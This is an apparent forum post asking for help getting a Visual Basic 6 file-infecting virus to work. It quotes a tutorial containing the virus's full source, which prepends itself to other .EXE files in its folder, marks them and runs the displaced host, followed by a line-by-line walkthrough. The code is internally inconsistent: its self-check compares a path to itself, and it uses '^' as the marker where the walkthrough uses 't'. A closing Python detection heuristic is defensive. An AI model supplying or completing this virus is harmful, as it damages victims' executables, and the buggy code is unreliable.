VB6.0 Virus

Hi, I'm totally new to VB and virus coding. I found this on the net and am trying to get it to work. When you compile it, it tries to infect itself, then goes no further! Please could someone help me? Thanks, PhonetiX.

EXE Appenders

Now we get to the real thing... the EXE appending viruses. This is a simple, unencrypted appending virus without any payload.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Cut here-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Option Explicit
Private victim As String
Private myarray() As Byte
Private varray As Byte
Private length As Long
Private chck As String

Const size As Integer = 18432

Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

Private Declare Function OpenProcess Lib "kernel32" _
(ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" _
(ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long

Private Sub Form_Load()

On Error Resume Next

Dim I As Long
Dim Free
Free = FreeFile

On Error GoTo Fin

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
myarray = Space$(size)
Get #1, 1, myarray
Close #Free

victim = Dir(App.Path & "\" & "*.EXE")
While victim <> ""

' If the victim file, has the same directory and name as the file
' that is running - skip the next part
If LCase(App.Path & "\" & App.EXEName & ".exe") _
<> LCase(App.Path & "\" & App.EXEName & ".exe") Then

Open Victim For Binary Access Read As #Free
varray = Space(LOF(Free)) ' Sets buffer up for the file data
Get #1, 1, varray ' Copy the file data into a variable
Close #Free

chck = Mid(varray, Len(varray)) ' Store the last character in the
' victim file in CheckX

If LCase(chck) <> "^" Then ' if the character = X then the file has
' already been infected, if not continue

Open victim For Binary Access Write As #Free
Put #Free, 1, myarray ' Place our code in the front of the file
Put #Free, size, varray ' Follow it immediately by the victims code
Put #Free, LOF(Free) + 1, "^" 'Place an X at the end to show it's been
'infected
Close #Free 'That's how this virus got its name!

End If
Else
End If

Victim = Dir() ' Find the next file to infect
Wend ' Go back to the start

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
length = (LOF(Free) - size) ' Store the length of the current file minus
' the virus file size in the variable
If Length > 0 Then ' if it's more than 0, the file is infected,
' if not, this is the raw virus file
myarray = Space(length) ' Create buffer in variable, for the size of
' the file
Get #Free, size, myarray ' Get the old host data from out of this file
Close #Free

Open App.Path & "\" & App.EXEName & ".tut" For Binary Access Write As #Free
Put #Free, , myarray ' Place the old host data into a temporary file
Close #Free

idProg = Shell(App.Path & "\" & App.EXEName & ".tut", vbNormalFocus)
' Run the old host code
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
' Get it running application code number
GetExitCodeProcess hProg, iExit

Do While iExit = STILL_ACTIVE ' Wait until the program is shut down
DoEvents
GetExitCodeProcess hProg, iExit
Loop
On Error Resume Next
Kill App.Path & "\" & App.EXEName & ".tut" ' Delete the old host code

Else
Close #Free
End If
End
Fin:
End Sub

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Cut here-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Now let's go over it part by part:

Option Explicit
Private victim As String
Private myrray() As Byte
Private varray As Byte
Private length As Long
Private chck As String
Const size As Integer = 18432

Here we define the variables that we will use: the "myarray()" variable holds the binary code of the virus, the "victim" variable holds the victim file's name and the "mysize" variable holds the size of the virus. You will need to change the number to the size of your virus. The length variable holds the running file's length and the chck variable will be used to check if we have already infected the file.

Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Declare Function OpenProcess Lib "kernel32" _
(ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" _
(ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long

These are the variables, constants and declarations that we will use for process checking.

Private Sub Form_Load()
On Error Resume Next

We open the sub we will use (Form_Load), and we put our error handler there.

Dim Free
Free = FreeFile

This is a good idea taken from the y2k virus. This will rid you of read/write errors because it will open a free file.

On Error GoTo Fin

This is our error handler. If there is an error it will ignore all code and go to the Fin marker which is the end.

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
myarray = Space$(size)
Get #1, 1, myarray
Close #Free

Now we get the binary code out of our virus and we store it in the "myarray" variable.

victim = Dir(App.Path & "\" & "*.EXE")
While victim <> ""

If LCase(App.Path & "\" & App.EXEName & ".exe") _
<> LCase(App.Path & "\" & App.EXEName & ".exe") Then

If our victim file is the same as the one running, same directory and same name, we do not infect.


Open Victim For Binary Access Read As #Free
varray = Space(LOF(Free))
Get #1, 1, varray
Close #Free

We get the binary code from our victim file and store it in the varray variable.


chck = Mid(varray, Len(varray))

We store the last character of the victim file in the chck variable for later use of infection checking.

If LCase(chck) <> "t" Then

If the last character isn't "t" then it means that it's not infected, so continue.


Open victim For Binary Access Write As #Free
Put #Free, 1, myarray
Put #Free, size, varray
Put #Free, LOF(Free) + 1, "t"
Close #Free

End If
Else
End If

Now we write our virus code first and then the original file code in the file and we also include the "t" character to mark it as infected.

Victim = Dir()
Wend

This finds the next file to infect and redoes the whole routine.

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
length = (LOF(Free) - size)
If Length > 0 Then
myarray = Space(length)
Get #Free, size, myarray
Close #Free

Now we get the file's size minus the virus; if it isn't 0 it means that it is infected.

Open App.Path & "\" & App.EXEName & ".tut" _
For Binary Access Write As #Free
Put #Free, , myarray ' Place the old host data into a temporary file
Close #Free

We put the host data in a file we make. A temporary file.

idProg = Shell(App.Path & "\" & App.EXEName & ".tut", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit

Now we run the original host program.

Do While iExit = STILL_ACTIVE ' Wait until the program is shut down
DoEvents
GetExitCodeProcess hProg, iExit
Loop

Wait for the program to be terminated.

On Error Resume Next
Kill App.Path & "\" & App.EXEName & ".tut" ' Delete the old host code

Else

End If

End

Fin:

End Sub
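
From the defender's side, the on-disk layout the tutorial describes (a stub image, then the original host program, then a one-character marker at the end of the file) can be triaged with a simple heuristic. The following is an added example, not part of the original post; the function names and the sample bytes are constructed for illustration, and an embedded image on its own also occurs in legitimate installers.

```python
import struct

def pe_header_at(data, off):
    """True if a DOS header at `off` points to a 'PE\\0\\0' signature inside data."""
    if data[off:off + 2] != b"MZ" or off + 0x40 > len(data):
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, off + 0x3C)
    sig = off + e_lfanew
    return e_lfanew > 0 and sig + 4 <= len(data) and data[sig:sig + 4] == b"PE\0\0"

def embedded_images(data):
    """Offsets past 0 where a second, structurally valid PE image begins."""
    hits, pos = [], data.find(b"MZ", 1)
    while pos != -1:
        if pe_header_at(data, pos):
            hits.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return hits

def triage(data, markers=(b"^", b"t", b"x")):
    """Classify one file's bytes. Markers are the characters the page mentions,
    compared in lower case as the page's LCase() check does."""
    offsets = embedded_images(data) if pe_header_at(data, 0) else []
    last = data[-1:].lower()
    marker = last if last in markers else None
    if offsets and marker:
        verdict = "prepended-host layout"
    elif offsets:
        verdict = "embedded image, review"  # installers and SFX archives land here
    else:
        verdict = "no finding"
    return {"embedded_at": offsets, "marker": marker, "verdict": verdict}

def fake_pe(total):
    """Constructed sample: the smallest byte string that passes pe_header_at()."""
    hdr = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0"
    return hdr.ljust(total, b"\0")

if __name__ == "__main__":
    samples = {
        "plain.exe": fake_pe(512),
        "bundle.exe": fake_pe(512) + fake_pe(256),
        "layout.exe": fake_pe(512) + fake_pe(256) + b"^",
    }
    for name, blob in samples.items():
        print(name, triage(blob))
```
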
